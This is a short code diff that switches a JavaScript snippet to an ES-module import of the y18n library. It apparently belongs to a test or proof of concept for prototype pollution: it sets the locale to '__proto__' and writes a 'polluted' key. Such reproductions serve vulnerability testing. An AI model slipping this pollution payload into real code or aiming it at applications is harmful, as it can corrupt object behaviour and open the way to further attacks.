@@ -1,4 +1,5 @@
-const y18n = require('y18n')();
+import Y18n from 'y18n';
+const y18n = Y18n();
 //var polluted;
 y18n.setLocale('__proto__');
 y18n.updateLocale({polluted: true});
